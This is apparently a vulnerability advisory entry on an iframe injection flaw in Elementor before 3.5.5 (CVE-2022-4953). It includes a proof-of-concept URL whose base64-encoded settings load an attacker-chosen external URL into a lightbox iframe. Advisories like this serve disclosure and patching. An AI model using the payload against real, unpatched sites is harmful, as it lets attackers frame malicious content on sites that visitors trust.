WordPress Plugin Vulnerabilities

Elementor < 3.5.5 - Iframe Injection

Description

The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.

Proof of Concept

https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

Affects Plugins

Plugin icon
elementor
Fixed in 3.5.5

References

CVE
CVE-2022-4953
URL
https://github.com/elementor/elementor/commit/292fc49e0f979bd52d838f0326d1faaebfa59f5e

Classification

Type
CROSS FRAME SCRIPTING
OWASP top 10
A1: Injection
CWE
CWE-80
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Miguel Santareno
Submitter
Miguel Santareno
Submitter website
https://miguelsantareno.github.io/
Submitter twitter
MiguelSantareno
Verified
Yes
WPVDB ID
8273357e-f9e1-44bc-8082-8faab838eda7

Timeline

Publicly Published
2023-07-19 (about 9 months ago)
Added
2023-07-19 (about 9 months ago)
Last Updated
2023-07-19 (about 9 months ago)

Other

Published
Title
Published
2023-12-15
Title
Post Grid Combo – 36+ Gutenberg Blocks < 2.2.65 - Authenticated (Contributor+) Cross-Site Scripting
Published
2020-10-15
Title
Comment Press < 2.7.2 - Unauthenticated Cross-Frame Scripting
Published
2024-05-08
Title
Pure Chat – Live Chat Plugin & More! <= 2.22 - Authenticated (Subscriber+) Stored Cross-Site Scripting
Published
2024-03-14
Title
UsersWP < 1.2.7 - Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2024-03-07
Title
WP-Members Membership Plugin < 3.4.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode